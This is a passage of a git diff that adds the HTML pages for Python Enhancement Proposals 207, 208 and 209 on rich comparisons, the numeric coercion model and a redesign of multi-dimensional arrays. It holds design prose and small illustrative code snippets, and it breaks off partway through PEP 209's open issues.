  • Classes can define new special methods __lt__, __le__, __eq__, +__ne__, __gt__, __ge__ to override the corresponding operators. +(I.e., <, <=, ==, !=, >, >=. You gotta love the Fortran +heritage.) If a class defines __cmp__ as well, it is only used +when __lt__ etc. have been tried and return NotImplemented. +(See the sketch after this list.)
  • +
+
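As a sketch of what these methods enable, here is a toy elementwise-comparing type in the spirit of the NumPy motivation (the Vector class is invented for illustration):

class Vector:
    def __init__(self, data):
        self.data = list(data)
    def __lt__(self, other):
        # Return a non-Boolean result: one outcome per element pair.
        return [a < b for a, b in zip(self.data, other.data)]
    def __eq__(self, other):
        return [a == b for a, b in zip(self.data, other.data)]

print(Vector([1, 2, 3]) < Vector([2, 2, 4]))   # [True, False, True]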
+
+ +
+

Appendix

+

Here is most of David Ascher’s original proposal (version 0.2.1, +dated Wed Jul 22 16:49:28 1998; I’ve left the Contents, History +and Patches sections out). It addresses almost all concerns +above.

+
+
+

Abstract

+

A new mechanism allowing comparisons of Python objects to return +values other than -1, 0, or 1 (or raise exceptions) is +proposed. This mechanism is entirely backwards compatible, and can +be controlled at the level of the C PyObject type or of the Python +class definition. There are three cooperating parts to the +proposed mechanism:

+
    +
  • the use of the last slot in the type object structure to store a +pointer to a rich comparison function
  • +
  • the addition of special methods for classes
  • +
  • the addition of an optional argument to the builtin cmp() +function.
  • +
+
+
+

Motivation

+

The current comparison protocol for Python objects assumes that +any two Python objects can be compared (as of Python 1.5, object +comparisons can raise exceptions), and that the return value for +any comparison should be -1, 0 or 1. -1 indicates that the first +argument to the comparison function is less than the right one, +1 +indicating the contrapositive, and 0 indicating that the two +objects are equal. While this mechanism allows the establishment +of an order relationship (e.g. for use by the sort() method of list +objects), it has proven to be limited in the context of Numeric +Python (NumPy).

+

Specifically, NumPy allows the creation of multidimensional +arrays, which support most of the numeric operators. Thus:

+
x = array((1,2,3,4))
+y = array((2,2,4,4))
+
+
+

are two NumPy arrays. While they can be added elementwise:

+
z = x + y   # z == array((3,4,7,8))
+
+
+

they cannot be compared in the current framework - the released +version of NumPy compares the pointers (thus yielding junk +information), which was the only solution before the recent +addition of the ability (in 1.5) to raise exceptions in comparison +functions.

+

Even with the ability to raise exceptions, the current protocol +makes array comparisons useless. To deal with this fact, NumPy +includes several functions which perform the comparisons: less(), +less_equal(), greater(), greater_equal(), equal(), +not_equal(). These functions return arrays with the same shape as +their arguments (modulo broadcasting), filled with 0’s and 1’s +depending on whether the comparison is true or not for each +element pair. Thus, for example, using the arrays x and y defined +above:

+
less(x,y)
+
+
+

would be an array containing the numbers (1,0,0,0).

+

The current proposal is to modify the Python object interface to +allow the NumPy package to make it so that x < y returns the same +thing as less(x,y). The exact return value is up to the NumPy +package – what this proposal really asks for is changing the +Python core so that extension objects have the ability to return +something other than -1, 0, 1, should their authors choose to do +so.

+
+
+

Current State of Affairs

+

The current protocol is, at the C level, that each object type +defines a tp_compare slot, which is a pointer to a function which +takes two PyObject* references and returns -1, 0, or 1. This +function is called by the PyObject_Compare() function defined in +the C API. PyObject_Compare() is also called by the builtin +function cmp() which takes two arguments.

+
+

Proposed Mechanism

+
    +
  1. Changes to the C structure for type objects

    The last available slot in the PyTypeObject, reserved up to now +for future expansion, is used to optionally store a pointer to a +new comparison function, of type richcmpfunc defined by:

    +
    typedef PyObject *(*richcmpfunc)
    +     Py_PROTO((PyObject *, PyObject *, int));
    +
    +
    +

    This function takes three arguments. The first two are the objects +to be compared, and the third is an integer corresponding to an +opcode (one of LT, LE, EQ, NE, GT, GE). If this slot is left NULL, +then rich comparison for that object type is not supported (except +for class instances whose class provide the special methods +described below).

    +

    The above opcodes need to be added to the published Python/C API +(probably under the names Py_LT, Py_LE, etc.)

    +
  2. +
  3. Additions of special methods for classes

    Classes wishing to support the rich comparison mechanisms must add +one or more of the following new special methods:

    +
    def __lt__(self, other):
    +   ...
    +def __le__(self, other):
    +   ...
    +def __gt__(self, other):
    +   ...
    +def __ge__(self, other):
    +   ...
    +def __eq__(self, other):
    +   ...
    +def __ne__(self, other):
    +   ...
    +
    +
    +

    Each of these is called when the class instance is on the +left-hand side of the corresponding operators (<, <=, >, >=, ==, +and != or <>). The argument other is set to the object on the +right side of the operator. The return value of these methods is +up to the class implementor (after all, that’s the entire point of +the proposal).

    +

    If the object on the left side of the operator does not define an +appropriate rich comparison operator (either at the C level or +with one of the special methods), then the comparison is reversed, +and the right hand operator is called with the opposite operator, +and the two objects are swapped. This assumes that a < b and b > a +are equivalent, as are a <= b and b >= a, and that == and != are +commutative (e.g. a == b if and only if b == a).

    +

    For example, if obj1 is an object which supports the rich +comparison protocol and x and y are objects which do not support +the rich comparison protocol, then obj1 < x will call the __lt__ +method of obj1 with x as the second argument. x < obj1 will call +obj1’s __gt__ method with x as a second argument, and x < y will +just use the existing (non-rich) comparison mechanism.

    +

    The above mechanism is such that classes can get away with not +implementing either __lt__ and __le__ or __gt__ and +__ge__. Further smarts could have been added to the comparison +mechanism, but this limited set of allowed “swaps” was chosen +because it doesn’t require the infrastructure to do any processing +(negation) of return values. The choice of six special methods was +made over a single (e.g. __richcmp__) method to allow the +dispatching on the opcode to be performed at the level of the C +implementation rather than the user-defined method.

    +
  4. +
  5. Addition of an optional argument to the builtin cmp()

    The builtin cmp() is still used for simple comparisons. For rich +comparisons, it is called with a third argument, one of “<”, “<=”, +“>”, “>=”, “==”, “!=”, “<>” (the last two have the same +meaning). When called with one of these strings as the third +argument, cmp() can return any Python object. Otherwise, it can +only return -1, 0 or 1 as before.

    +
  6. +
+
+
+

Chained Comparisons

+
+

Problem

+

It would be nice to allow objects for which the comparison returns +something other than -1, 0, or 1 to be used in chained +comparisons, such as:

+
x < y < z
+
+
+

Currently, this is interpreted by Python as:

+
temp1 = x < y
+if temp1:
+  return y < z
+else:
+  return temp1
+
+
+

Note that this requires testing the truth value of the result of +comparisons, with potential “shortcutting” of the right-side +comparison testings. In other words, the truth-value of the result +of the comparison determines the result of a chained +operation. This is problematic in the case of arrays, since if x, +y and z are three arrays, then the user expects:

+
x < y < z
+
+
+

to be an array of 0’s and 1’s where 1’s are in the locations +corresponding to the elements of y which are between the +corresponding elements in x and z. In other words, the right-hand +side must be evaluated regardless of the result of x < y, which is +incompatible with the mechanism currently in use by the parser.

+
+
+

Solution

+

Guido mentioned that one possible way out would be to change the +code generated by chained comparisons to allow arrays to be +chained-compared intelligently. What follows is a mixture of his +idea and my suggestions. The code generated for x < y < z would be +equivalent to:

+
temp1 = x < y
+if temp1:
+  temp2 = y < z
+  return boolean_combine(temp1, temp2)
+else:
+  return temp1
+
+
+

where boolean_combine is a new function which does something like +the following:

+
def boolean_combine(a, b):
+    if hasattr(a, '__boolean_and__') or \
+       hasattr(b, '__boolean_and__'):
+        try:
+            return a.__boolean_and__(b)
+        except:
+            return b.__boolean_and__(a)
+    else: # standard behavior
+        if a:
+            return b
+        else:
+            return 0
+
+
+

where the __boolean_and__ special method is implemented for +C-level types by another value of the third argument to the +richcmp function. This method would perform a boolean comparison +of the arrays (currently implemented in the umath module as the +logical_and ufunc).

+

Thus, objects returned by rich comparisons should always test +true, but should define another special method which creates +boolean combinations of them and their argument.

+

This solution has the advantage of allowing chained comparisons to +work for arrays, but the disadvantage that it requires comparison +arrays to always return true (in an ideal world, I’d have them +always raise an exception on truth testing, since the meaning of +testing “if a>b:” is massively ambiguous).

+

The inlining already present which deals with integer comparisons +would still apply, resulting in no performance cost for the most +common cases.

+
+
+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0207.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0208/index.html b/pep-0208/index.html new file mode 100644 index 00000000000..40da28af6c3 --- /dev/null +++ b/pep-0208/index.html @@ -0,0 +1,386 @@ + PEP 208 – Reworking the Coercion Model | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 208 – Reworking the Coercion Model

+
+
Author:
+
Neil Schemenauer <nas at arctrix.com>, Marc-André Lemburg <mal at lemburg.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
04-Dec-2000
+
Python-Version:
+
2.1
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

Many Python types implement numeric operations. When the arguments of +a numeric operation are of different types, the interpreter tries to +coerce the arguments into a common type. The numeric operation is +then performed using this common type. This PEP proposes a new type +flag to indicate that arguments to a type’s numeric operations should +not be coerced. Operations that do not support the supplied types +indicate it by returning a new singleton object. Types which do not +set the type flag are handled in a backwards compatible manner. +Allowing operations to handle different types is often simpler, more +flexible, and faster than having the interpreter do coercion.

+
+
+

Rationale

+

When implementing numeric or other related operations, it is often +desirable to provide not only operations between operands of one type +only, e.g. integer + integer, but to generalize the idea behind the +operation to other type combinations as well, e.g. integer + float.

+

A common approach to this mixed type situation is to provide a method +of “lifting” the operands to a common type (coercion) and then use +that type’s operand method as execution mechanism. Yet, this strategy +has a few drawbacks:

+
    +
  • the “lifting” process creates at least one new (temporary) +operand object,
  • +
  • since the coercion method is not being told about the operation +that is to follow, it is not possible to implement operation +specific coercion of types,
  • +
  • there is no elegant way to solve situations where a common type +is not at hand, and
  • +
  • the coercion method will always have to be called prior to the +operation’s method itself.
  • +
+

A fix for this situation is obviously needed, since these drawbacks +make implementations of types needing these features very cumbersome, +if not impossible. As an example, have a look at the DateTime and +DateTimeDelta [1] types, the first being absolute, the second +relative. You can always add a relative value to an absolute one, +giving a new absolute value. Yet, there is no common type which the +existing coercion mechanism could use to implement that operation.

+

Currently, PyInstance types are treated specially by the interpreter +in that their numeric methods are passed arguments of different types. +Removing this special case simplifies the interpreter and allows other +types to implement numeric methods that behave like instance types. +This is especially useful for extension types like ExtensionClass.

+
+
+

Specification

+

Instead of using a central coercion method, the process of handling +different operand types is simply left to the operation. If the +operation finds that it cannot handle the given operand type +combination, it may return a special singleton as indicator.

+

Note that “numbers” (anything that implements the number protocol, or +part of it) written in Python already use the first part of this +strategy - it is the C level API that we focus on here.

+

To maintain nearly 100% backward compatibility we have to be very +careful to make numbers that don’t know anything about the new +strategy (old style numbers) work just as well as those that expect +the new scheme (new style numbers). Furthermore, binary compatibility +is a must, meaning that the interpreter may only access and use new +style operations if the number indicates the availability of these.

+

A new style number is considered by the interpreter as such if and +only if it sets the type flag Py_TPFLAGS_CHECKTYPES. The main +difference between an old style number and a new style one is that the +numeric slot functions can no longer assume to be passed arguments of +identical type. New style slots must check all arguments for proper +type and implement the necessary conversions themselves. This may seem +to cause more work on the behalf of the type implementor, but is in +fact no more difficult than writing the same kind of routines for an +old style coercion slot.

+

If a new style slot finds that it cannot handle the passed argument +type combination, it may return a new reference of the special +singleton Py_NotImplemented to the caller. This will cause the caller +to try the other operand’s operation slots until it finds a slot that +does implement the operation for the specific type combination. If +none of the possible slots succeed, it raises a TypeError.
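
+
The same fallback can be watched at today's Python level through the NotImplemented singleton; a minimal sketch (the Metres class is purely illustrative):

+
class Metres:
+    def __init__(self, n):
+        self.n = n
+    def __add__(self, other):
+        if isinstance(other, Metres):
+            return Metres(self.n + other.n)
+        return NotImplemented              # let the other operand's slot try
+    __radd__ = __add__                     # addition is symmetric here
+
+print (Metres(2) + Metres(3)).n            # -> 5
+try:
+    Metres(2) + 'x'                        # no slot succeeds
+except TypeError:
+    print 'TypeError, as described above'
+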

+

To make the implementation easy to understand (the whole topic is +esoteric enough), a new layer in the handling of numeric operations is +introduced. This layer takes care of all the different cases that need +to be taken into account when dealing with all the possible +combinations of old and new style numbers. It is implemented by the +two static functions binary_op() and ternary_op(), which are both +internal functions that only the functions in Objects/abstract.c +have access to. The numeric API (PyNumber_*) is easy to adapt to +this new layer.

+

As a side-effect all numeric slots can be NULL-checked (this has to be +done anyway, so the added feature comes at no extra cost).

+

The scheme used by the layer to execute a binary operation is as +follows:

+ + + + + + + + + + + + + + + + + + + + + + + + + +
vwAction taken
newnewv.op(v,w), w.op(v,w)
newoldv.op(v,w), coerce(v,w), v.op(v,w)
oldneww.op(v,w), coerce(v,w), v.op(v,w)
oldoldcoerce(v,w), v.op(v,w)
+

The indicated action sequence is executed from left to right until +either the operation succeeds and a valid result (!= +Py_NotImplemented) is returned or an exception is raised. Exceptions +are returned to the calling function as-is. If a slot returns +Py_NotImplemented, the next item in the sequence is executed.
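
+
A pure-Python rendering of the binary table may make it easier to follow. Here is_new(), coerce_pair() and NOT_IMPLEMENTED are made-up stand-ins for the Py_TPFLAGS_CHECKTYPES test, PyNumber_Coerce() and Py_NotImplemented, and each "coerce(v,w), v.op(v,w)" pair from the table is folded into a single action:

+
import operator
+
+NOT_IMPLEMENTED = object()                 # stand-in for Py_NotImplemented
+
+def is_new(obj):
+    # stand-in for the Py_TPFLAGS_CHECKTYPES flag test
+    return hasattr(obj, 'slot_add')
+
+def coerce_pair(v, w):
+    # stand-in for PyNumber_Coerce(): lift both operands to a common type
+    return float(v), float(w)
+
+def binary_op(v, w):
+    actions = []
+    if is_new(v):
+        actions.append(lambda: v.slot_add(v, w))
+    if is_new(w):
+        actions.append(lambda: w.slot_add(v, w))
+    if not (is_new(v) and is_new(w)):
+        # coerce(v,w) followed by the coerced type's slot, as one step
+        actions.append(lambda: operator.add(*coerce_pair(v, w)))
+    for action in actions:
+        result = action()
+        if result is not NOT_IMPLEMENTED:
+            return result
+    raise TypeError('unsupported operand types')
+
+print binary_op(2, 3.5)                    # old/old: coerce, then add -> 5.5
+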

+

Note that coerce(v,w) will use the old style nb_coerce slot methods +via a call to PyNumber_Coerce().

+

Ternary operations have a few more cases to handle:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
vwzAction taken
newnewnewv.op(v,w,z), w.op(v,w,z), z.op(v,w,z)
newoldnewv.op(v,w,z), z.op(v,w,z), coerce(v,w,z), v.op(v,w,z)
oldnewneww.op(v,w,z), z.op(v,w,z), coerce(v,w,z), v.op(v,w,z)
oldoldnewz.op(v,w,z), coerce(v,w,z), v.op(v,w,z)
newnewoldv.op(v,w,z), w.op(v,w,z), coerce(v,w,z), v.op(v,w,z)
newoldoldv.op(v,w,z), coerce(v,w,z), v.op(v,w,z)
oldnewoldw.op(v,w,z), coerce(v,w,z), v.op(v,w,z)
oldoldoldcoerce(v,w,z), v.op(v,w,z)
+

The same notes as above, except that coerce(v,w,z) actually does:

+
if z != Py_None:
+    coerce(v,w), coerce(v,z), coerce(w,z)
+else:
+    # treat z as absent variable
+    coerce(v,w)
+
+
+

The current implementation uses this scheme already (there’s only one +ternary slot: nb_pow(a,b,c)).

+

Note that the numeric protocol is also used for some other related +tasks, e.g. sequence concatenation. These can also benefit from the +new mechanism by implementing right-hand operations for type +combinations that would otherwise fail to work. As an example, take +string concatenation: currently you can only do string + string. With +the new mechanism, a new string-like type could implement new_type + +string and string + new_type, even though strings don’t know anything +about new_type.
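
+
For instance, a hypothetical string-like class (Path below is an invented name) needs only the usual pair of methods, each answering NotImplemented when it does not recognise the other operand:

+
class Path:
+    def __init__(self, s):
+        self.s = s
+    def __add__(self, other):              # Path + string
+        if isinstance(other, str):
+            return Path(self.s + other)
+        return NotImplemented
+    def __radd__(self, other):             # string + Path
+        if isinstance(other, str):
+            return Path(other + self.s)
+        return NotImplemented
+
+print (Path('/usr') + '/local').s          # -> /usr/local
+print ('/usr' + Path('/local')).s          # -> /usr/local
+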

+

Since comparisons also rely on coercion (every time you compare an +integer to a float, the integer is first converted to float and then +compared…), a new slot to handle numeric comparisons is needed:

+
PyObject *nb_cmp(PyObject *v, PyObject *w)
+
+
+

This slot should compare the two objects and return an integer object +stating the result. Currently, this result integer may only be -1, 0, 1. +If the slot cannot handle the type combination, it may return a +reference to Py_NotImplemented. [XXX Note that this slot is still +in flux since it should take into account rich comparisons +(i.e. PEP 207).]

+

Numeric comparisons are handled by a new numeric protocol API:

+
PyObject *PyNumber_Compare(PyObject *v, PyObject *w)
+
+
+

This function compares the two objects as “numbers” and returns an +integer object stating the result. Currently, this result integer may +only be -1, 0, 1. In case the operation cannot be handled by the given +objects, a TypeError is raised.

+

The PyObject_Compare() API needs to be adjusted accordingly to make use +of this new API.

+

Other changes include adapting some of the built-in functions (e.g. +cmp()) to use this API as well. Also, PyNumber_CoerceEx() will need to +check for new style numbers before calling the nb_coerce slot. New +style numbers don’t provide a coercion slot and thus cannot be +explicitly coerced.

+
+
+

Reference Implementation

+

A preliminary patch for the CVS version of Python is available through +the Source Forge patch manager [2].

+
+
+

Credits

+

This PEP and the patch are heavily based on work done by Marc-André +Lemburg [3].

+
+ +
+

References

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0208.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file
diff --git a/pep-0209/index.html b/pep-0209/index.html new file mode 100644 index 00000000000..f5edd1f8d18 --- /dev/null +++ b/pep-0209/index.html @@ -0,0 +1,746 @@
PEP 209 – Multi-dimensional Arrays | peps.python.org
+
+


+ + +
+
+
+

PEP 209 – Multi-dimensional Arrays

+
+
Author:
+
Paul Barrett <barrett at stsci.edu>, Travis Oliphant <oliphant at ee.byu.edu>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
03-Jan-2001
+
Python-Version:
+
2.2
+
Post-History:
+

+
+
+
+
+
+

Important

+

This PEP has been withdrawn.

+


+

+
+
+

Abstract

+

This PEP proposes a redesign and re-implementation of the +multi-dimensional array module, Numeric, to make it easier to add +new features and functionality to the module. Aspects of Numeric 2 +that will receive special attention are efficient access to arrays +exceeding a gigabyte in size and composed of inhomogeneous data +structures or records. The proposed design uses four Python +classes: ArrayType, UFunc, Array, and ArrayView; and a low-level +C-extension module, _ufunc, to handle the array operations +efficiently. In addition, each array type has its own C-extension +module which defines the coercion rules, operations, and methods +for that type. This design enables new types, features, and +functionality to be added in a modular fashion. The new version +will introduce some incompatibilities with the current Numeric.

+
+
+

Motivation

+

Multi-dimensional arrays are commonly used to store and manipulate +data in science, engineering, and computing. Python currently has +an extension module, named Numeric (henceforth called Numeric 1), +which provides a satisfactory set of functionality for users +manipulating homogeneous arrays of data of moderate size (of order +10 MB). For access to larger arrays (of order 100 MB or more) of +possibly inhomogeneous data, the implementation of Numeric 1 is +inefficient and cumbersome. In the future, requests by the +Numerical Python community for additional functionality are also +likely, as PEPs 211: Adding New Linear Operators to Python, and +225: Elementwise/Objectwise Operators illustrate.

+
+
+

Proposal

+

This proposal recommends a re-design and re-implementation of +Numeric 1, henceforth called Numeric 2, which will enable new +types, features, and functionality to be added in an easy and +modular manner. The initial design of Numeric 2 should focus on +providing a generic framework for manipulating arrays of various +types and should enable a straightforward mechanism for adding new +array types and UFuncs. Functional methods that are more specific +to various disciplines can then be layered on top of this core. +This new module will still be called Numeric and most of the +behavior found in Numeric 1 will be preserved.

+

The proposed design uses four Python classes: ArrayType, UFunc, +Array, and ArrayView; and a low-level C-extension module to handle +the array operations efficiently. In addition, each array type +has its own C-extension module which defines the coercion rules, +operations, and methods for that type. At a later date, when core +functionality is stable, some Python classes can be converted to +C-extension types.

+

Some planned features are:

+
    +
  1. Improved memory usage

    This feature is particularly important when handling large arrays +and can produce significant improvements in performance as well as +memory usage. We have identified several areas where memory usage +can be improved:

    +
      +
    1. Use a local coercion model

      Instead of using Python’s global coercion model which creates +temporary arrays, Numeric 2, like Numeric 1, will implement a +local coercion model as described in PEP 208 which defers the +responsibility of coercion to the operator. By using internal +buffers, a coercion operation can be done for each array +(including output arrays), if necessary, at the time of the +operation. Benchmarks [1] have shown that performance is at +most degraded only slightly and is improved in cases where the +internal buffers are less than the L2 cache size and the +processor is under load. To avoid array coercion altogether, +C functions having arguments of mixed type are allowed in +Numeric 2.

      +
    2. +
    3. Avoid creation of temporary arrays

      In complex array expressions (i.e. having more than one +operation), each operation will create a temporary array which +will be used and then deleted by the succeeding operation. A +better approach would be to identify these temporary arrays +and reuse their data buffers when possible, namely when the +array shape and type are the same as the temporary array being +created. This can be done by checking the temporary array’s +reference count. If it is 1, then it will be deleted once the +operation is done and is a candidate for reuse.

      +
    4. +
    5. Optional use of memory-mapped files

      Numeric users sometimes need to access data from very large +files or to handle data that is greater than the available +memory. Memory-mapped arrays provide a mechanism to do this +by storing the data on disk while making it appear to be in +memory. Memory-mapped arrays should improve access to all +files by eliminating one of two copy steps during a file +access. Numeric should be able to access in-memory and +memory-mapped arrays transparently.

      +
    6. +
    7. Record access

      In some fields of science, data is stored in files as binary +records. For example, in astronomy, photon data is stored as a +1 dimensional list of photons in order of arrival time. These +records or C-like structures contain information about the +detected photon, such as its arrival time, its position on the +detector, and its energy. Each field may be of a different +type, such as char, int, or float. Such arrays introduce new +issues that must be dealt with, in particular byte alignment +or byte swapping may need to be performed for the numeric +values to be properly accessed (though byte swapping is also +an issue for memory mapped data). Numeric 2 is designed to +automatically handle alignment and representational issues +when data is accessed or operated on. There are two +approaches to implementing records; as either a derived array +class or a special array type, depending on your point-of-view. +We defer this discussion to the Open Issues section.

      +
    8. +
    +
  2. +
  3. Additional array types

    Numeric 1 has 11 defined types: char, ubyte, sbyte, short, int, +long, float, double, cfloat, cdouble, and object. There are no +ushort, uint, or ulong types, nor are there more complex types +such as a bit type which is of use to some fields of science and +possibly for implementing masked-arrays. The design of Numeric 1 +makes the addition of these and other types a difficult and +error-prone process. To enable the easy addition (and deletion) +of new array types such as a bit type described below, a re-design +of Numeric is necessary.

    +
      +
    1. Bit type

      The result of a rich comparison between arrays is an array of +boolean values. The result can be stored in an array of type +char, but this is an unnecessary waste of memory. A better +implementation would use a bit or boolean type, compressing +the array size by a factor of eight. This is currently being +implemented for Numeric 1 (by Travis Oliphant) and should be +included in Numeric 2. (A toy packing sketch follows this feature list.)

      +
    2. +
    +
  4. +
  5. Enhanced array indexing syntax

    The extended slicing syntax was added to Python to provide greater +flexibility when manipulating Numeric arrays by allowing +step-sizes greater than 1. This syntax works well as a shorthand +for a list of regularly spaced indices. For those situations +where a list of irregularly spaced indices is needed, an enhanced +array indexing syntax would allow 1-D arrays to be arguments.

    +
  6. +
  7. Rich comparisons

    The implementation of PEP 207: Rich Comparisons in Python 2.1 +provides additional flexibility when manipulating arrays. We +intend to implement this feature in Numeric 2.

    +
  8. +
  9. Array broadcasting rules

    When an operation between a scalar and an array is done, the +implied behavior is to create a new array having the same shape as +the array operand containing the scalar value. This is called +array broadcasting. It also works with arrays of lesser rank, +such as vectors. This implicit behavior is implemented in Numeric +1 and will also be implemented in Numeric 2.

    +
  10. +
+
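
+
To make the factor-of-eight saving behind the proposed bit type concrete, here is the toy packing sketch promised in the feature list above. It is plain illustrative Python, not Numeric code; it stores eight 0/1 flags per byte, low bit first:

+
def pack_bits(flags):
+    packed = []
+    for i in range(0, len(flags), 8):
+        byte = 0
+        chunk = flags[i:i+8]
+        for j in range(len(chunk)):
+            if chunk[j]:
+                byte = byte | (1 << j)
+        packed.append(byte)
+    return packed
+
+print pack_bits([1, 0, 1, 1, 0, 0, 0, 0, 1])   # -> [13, 1]
+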
+
+

Design and Implementation

+

The design of Numeric 2 has four primary classes:

+
    +
  1. ArrayType:

    This is a simple class that describes the fundamental properties +of an array-type, e.g. its name, its size in bytes, its coercion +relations with respect to other types, etc., e.g.

    +
    Int32 = ArrayType('Int32', 4, 'doc-string')
    +
    +
    +

    Its relation to the other types is defined when the C-extension +module for that type is imported. The corresponding Python code +is:

    +
    Int32.astype[Real64] = Real64
    +
    +
    +

    This says that the Real64 array-type has higher priority than the +Int32 array-type.

    +

    The following attributes and methods are proposed for the core +implementation. Additional attributes can be added on an +individual basis, e.g. .bitsize or .bitstrides for the bit type.

    +

    Attributes:

    +
    .name:                  e.g. "Int32", "Float64", etc.
    +.typecode:              e.g. 'i', 'f', etc.
    +                        (for backward compatibility)
    +.size (in bytes):       e.g. 4, 8, etc.
    +.array_rules (mapping): rules between array types
    +.pyobj_rules (mapping): rules between array and python types
    +.doc:                   documentation string
    +
    +
    +

    Methods:

    +
    __init__():             initialization
    +__del__():              destruction
    +__repr__():             representation
    +
    +
    +

    C-API: This still needs to be fleshed-out.

    +
  2. +
  3. UFunc:

    This class is the heart of Numeric 2. Its design is similar to +that of ArrayType in that the UFunc creates a singleton callable +object whose attributes are name, total and input number of +arguments, a document string, and an empty CFunc dictionary; e.g.

    +
    add = UFunc('add', 3, 2, 'doc-string')
    +
    +
    +

    When defined the add instance has no C functions associated with +it and therefore can do no work. The CFunc dictionary is +populated or registered later when the C-extension module for an +array-type is imported. The arguments of the register method are: +function name, function descriptor, and the CUFunc object. The +corresponding Python code is

    +
    add.register('add', (Int32, Int32, Int32), cfunc-add)
    +
    +
    +

    In the initialization function of an array type module, e.g. +Int32, there are two C API functions: one to initialize the +coercion rules and the other to register the CFunc objects.

    +

    When an operation is applied to some arrays, the __call__ method +is invoked. It gets the type of each array (if the output array +is not given, it is created from the coercion rules) and checks +the CFunc dictionary for a key that matches the argument types. +If it exists the operation is performed immediately, otherwise the +coercion rules are used to search for a related operation and set +of conversion functions. The __call__ method then invokes a +compute method written in C to iterate over slices of each array, +namely:

    +
    _ufunc.compute(slice, data, func, swap, conv)
    +
    +
    +

    The ‘func’ argument is a CFuncObject, while the ‘swap’ and ‘conv’ +arguments are lists of CFuncObjects for those arrays needing pre- or +post-processing, otherwise None is used. The data argument is +a list of buffer objects, and the slice argument gives the number +of iterations for each dimension along with the buffer offset and +step size for each array and each dimension.

    +

    We have predefined several UFuncs for use by the __call__ method: +cast, swap, getobj, and setobj. The cast and swap functions do +coercion and byte-swapping, respectively and the getobj and setobj +functions do coercion between Numeric arrays and Python sequences.

    +

    The following attributes and methods are proposed for the core +implementation.

    +

    Attributes:

    +
    .name:                  e.g. "add", "subtract", etc.
    +.nargs:                 number of total arguments
    +.iargs:                 number of input arguments
    +.cfuncs (mapping):      the set C functions
    +.doc:                   documentation string
    +
    +
    +

    Methods:

    +
    __init__():             initialization
    +__del__():              destruction
    +__repr__():             representation
    +__call__():             look-up and dispatch method
    +initrule():             initialize coercion rule
    +uninitrule():           uninitialize coercion rule
    +register():             register a CUFunc
    +unregister():           unregister a CUFunc
    +
    +
    +

    C-API: This still needs to be fleshed-out.

    +
  4. +
  5. Array:

    This class contains information about the array, such as shape, +type, endian-ness of the data, etc. Its operators, ‘+’, ‘-’, +etc., just invoke the corresponding UFunc function, e.g.

    +
    def __add__(self, other):
    +    return ufunc.add(self, other)
    +
    +
    +

    The following attributes, methods, and functions are proposed for +the core implementation.

    +

    Attributes:

    +
    .shape:                 shape of the array
    +.format:                type of the array
    +.real (only complex):   real part of a complex array
    +.imag (only complex):   imaginary part of a complex array
    +
    +
    +

    Methods:

    +
    __init__():             initialization
    +__del__():              destruction
    +__repr_():              representation
    +__str__():              pretty representation
    +__cmp__():              rich comparison
    +__len__():
    +__getitem__():
    +__setitem__():
    +__getslice__():
    +__setslice__():
    +numeric methods:
    +copy():                 copy of array
    +aslist():               create list from array
    +asstring():             create string from array
    +
    +
    +

    Functions:

    +
    fromlist():             create array from sequence
    +fromstring():           create array from string
    +array():                create array with shape and value
    +concat():               concatenate two arrays
    +resize():               resize array
    +
    +
    +

    C-API: This still needs to be fleshed-out.

    +
  6. +
  7. ArrayView

    This class is similar to the Array class except that the reshape +and flat methods will raise exceptions, since non-contiguous +arrays cannot be reshaped or flattened using just pointer and +step-size information.

    +

    C-API: This still needs to be fleshed-out.

    +
  8. +
  9. C-extension modules:

    Numeric2 will have several C-extension modules.

    +
      +
    1. _ufunc:

      The primary module of this set is the _ufuncmodule.c. The +intention of this module is to do the bare minimum, +i.e. iterate over arrays using a specified C function. The +interface of these functions is the same as Numeric 1, i.e.

      +
      int (*CFunc)(char *data, int *steps, int repeat, void *func);
      +
      +
      +

      and their functionality is expected to be the same, i.e. they +iterate over the inner-most dimension.

      +

      The following attributes and methods are proposed for the core +implementation.

      +

      Attributes:

      +

      Methods:

      +
      compute():
      +
      +
      +

      C-API: This still needs to be fleshed-out.

      +
    2. +
    3. _int32, _real64, etc.:

      There will also be C-extension modules for each array type, +e.g. _int32module.c, _real64module.c, etc. As mentioned +previously, when these modules are imported by the UFunc +module, they will automatically register their functions and +coercion rules. New or improved versions of these modules can +be easily implemented and used without affecting the rest of +Numeric 2.

      +
    4. +
    +
  10. +
+
+
+

Open Issues

+
    +
  1. Does slicing syntax default to copy or view behavior?

    The default behavior of Python is to return a copy of a sub-list +or tuple when slicing syntax is used, whereas Numeric 1 returns a +view into the array. The choice made for Numeric 1 is apparently +for reasons of performance: the developers wish to avoid the +penalty of allocating and copying the data buffer during each +array operation and feel that the need for a deep copy of an array +is rare. Yet, some have argued that Numeric’s slice notation +should also have copy behavior to be consistent with Python lists. +In this case the performance penalty associated with copy behavior +can be minimized by implementing copy-on-write. This scheme has +both arrays sharing one data buffer (as in view behavior) until +either array is assigned new data at which point a copy of the +data buffer is made. View behavior would then be implemented by +an ArrayView class, whose behavior would be similar to Numeric 1 arrays, +i.e. .shape is not settable for non-contiguous arrays. The use of +an ArrayView class also makes explicit what type of data the array +contains. (A toy sketch of the copy-on-write idea appears after this +Open Issues list.)

    +
  2. +
  3. Does item syntax default to copy or view behavior?

    A similar question arises with the item syntax. For example, if +a = [[0,1,2], [3,4,5]] and b = a[0], then changing b[0] also changes +a[0][0], because a[0] is a reference or view of the first row of a. +Therefore, if c is a 2-d array, it would appear that c[i] +should return a 1-d array which is a view into, instead of a copy +of, c for consistency. Yet, c[i] can be considered just a +shorthand for c[i,:] which would imply copy behavior assuming +slicing syntax returns a copy. Should Numeric 2 behave the same +way as lists and return a view or should it return a copy?

    +
  4. +
  5. How is scalar coercion implemented?

